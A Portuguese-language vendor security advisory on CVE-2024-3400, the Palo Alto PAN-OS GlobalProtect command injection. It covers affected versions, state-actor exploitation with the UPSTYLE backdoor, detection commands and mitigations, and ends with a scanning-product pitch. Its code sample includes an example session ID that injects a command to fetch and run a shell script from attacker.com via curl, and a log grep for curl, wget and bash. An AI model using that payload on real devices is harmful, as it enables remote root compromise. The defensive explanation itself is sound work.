剣 KENSAI
Crítico CVE-2024-3400 Janeiro 2026 · 9 min de leitura

CVE-2024-3400: Injeção de comando Palo Alto PAN-OS - CVSS 10.0

CVE-2024-3400 é uma vulnerabilidade de injeção de comando de sistema operacional de gravidade máxima no gateway PAN-OS GlobalProtect da Palo Alto Networks. Um invasor não autenticado pode executar comandos arbitrários do sistema operacional como root, sem necessidade de interação. Explorado por UTA0218 (provavelmente patrocinado pelo estado) antes da divulgação.


10.0
CRÍTICO (MÁX.)
AtributoValor
ID do CVECVE-2024-3400
Vetor CVSSAV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CWECWE-77: Injeção de comando do sistema operacional
Publicado12 de abril de 2024
ExploraçãoAtivo — CISA KEV, exploração por ator estatal

O que é CVE-2024-3400?

CVE-2024-3400 afeta o recurso GlobalProtect do Palo Alto Networks PAN-OS. Quando o GlobalProtect é configurado como um gateway ou portal, um invasor remoto não autenticado pode injetar comandos arbitrários do sistema operacional que são executados com privilégios de root no dispositivo de firewall.

A combinação de fatores — sem necessidade de autenticação, acesso à rede, escopo alterado, impacto máximo na confidencialidade, integridade e disponibilidade — produz uma pontuação CVSS 10.0 perfeita. Entre os fornecedores de firewall, apenas algumas vulnerabilidades receberam essa pontuação.

🚨 Exploração do Estado-nação antes da disponibilidade do patch

A Volexity descobriu essa vulnerabilidade ao responder a um incidente em que UTA0218, um sofisticado agente de ameaças, implantou um novo backdoor Python chamado UPSTYLE em dispositivos PAN-OS comprometidos. O invasor usou o firewall como ponto central para acessar redes internas, roubar credenciais do Active Directory e exfiltrar dados confidenciais. A Volexity estima que a exploração começou no final de março de 2024 – semanas antes de Palo Alto ser notificado.

Sistemas afetados

Versão PAN-OSAfetado (GlobalProtect ativado)Versão Fixa
PAN-OS 11.1<11.1.2-h311.1.2-h3+
PAN-OS 11.0< 11.0.4-h111.0.4-h1+
PAN-OS 10.2< 10.2.9-h110.2.9-h1+
PAN-OS 10.1< 10.1.14-h410.1.14-h4+

Pré-requisito: O gateway ou portal GlobalProtect deve ser configurado (show global-protect-gateway current-user retorna resultados). As organizações que não configuraram o GlobalProtect não serão afetadas.

Análise Técnica

O ponto de injeção está no código de manipulação de sessão do GlobalProtect. Quando uma sessão do GlobalProtect é estabelecida, determinados atributos da sessão são gravados em arquivos temporários no firewall. O código que constrói o caminho do arquivo para esses arquivos de sessão não sanitiza adequadamente o identificador de sessão, que é parcialmente controlado pelo invasor.

# Simplified vulnerable file path construction
SESSION_ID = request.cookie["SESSID"]  # Attacker-controlled
session_file = f"/var/appweb/sslvpndocs/global-protect/{SESSION_ID}.log"
os.system(f"echo 'connected' >> {session_file}")  # Command injection here

# Attacker crafts session ID containing shell metacharacters:
# SESSION_ID = "../../tmp/evil;curl http://attacker.com/shell.sh|bash;"

O backdoor UPSTYLE instalado por UTA0218 usou um novo mecanismo de persistência: um script Python que monitorou logs de acesso ao servidor web para padrões de solicitação específicos (contendo um comando criptografado), executou os comandos e, em seguida, restaurou o conteúdo do arquivo original para remover evidências da atividade.

Atividade Pós-Exploração (UTA0218)

A Volexity documentou a seguinte sequência pós-exploração de atores do Estado-nação:

Detecção

Análise de log PAN-OS

# Check for UPSTYLE backdoor artifacts
find / -name "*.py" -newer /etc/passwd -not -path "*/site-packages/*" 2>/dev/null

# Suspicious traffic in GlobalProtect logs
grep -i "curl\|wget\|python\|bash" /var/log/pan/sslvpn.log

# Modified system files (UPSTYLE modifies then restores)
# Check for recent access times on web server files
find /var/appweb -atime -7 -name "*.php" -o -name "*.py"

Consultas de caça a ameaças

Mitigação

  1. Corrija imediatamente: Aplique as versões de hotfix listadas acima. Este é um CVSS 10.0 com exploração ativa – não há atraso aceitável.
  2. Solução provisória para prevenção de ameaças: Para dispositivos sem patch, ative a Prevenção contra ameaças com perfis de segurança nas interfaces GlobalProtect. Palo Alto forneceu assinaturas específicas de identificação de ameaças.
  3. Desative o GlobalProtect se não for necessário: As organizações que não usam ativamente o GlobalProtect podem desativar temporariamente o recurso como solução alternativa.
  4. Audite os arquivos de firewall: Execute o script fornecido por Palo Alto para verificar UPSTYLE e outros artefatos pós-exploração.
  5. Rotacione todas as credenciais: Quaisquer credenciais armazenadas na configuração do firewall (certificados VPN, credenciais de ligação LDAP, etc.) devem ser consideradas comprometidas.

💡 Diretriz de Emergência CISA: CISA emitiu a Diretiva de Emergência 24-03 exigindo que todas as agências federais dos EUA apliquem patches ou mitigações até 19 de abril de 2024. A urgência reflete a gravidade e a exploração ativa por parte de atores de ameaças sofisticados.

Capacidade de detecção KENSAI

Sua infraestrutura em Palo Alto está exposta a CVE-2024-3400?

KENSAI identifica instantaneamente dispositivos PAN-OS voltados para a Internet vulneráveis ​​à injeção de comando. Não espere que os agentes da ameaça os encontrem primeiro.

Faça uma varredura do seu perímetro agora →

Artigos relacionados

Industrialização de malware assistida por IA: transparente Redirecionando... KENSAI vs SonarQube: 2025 melhor...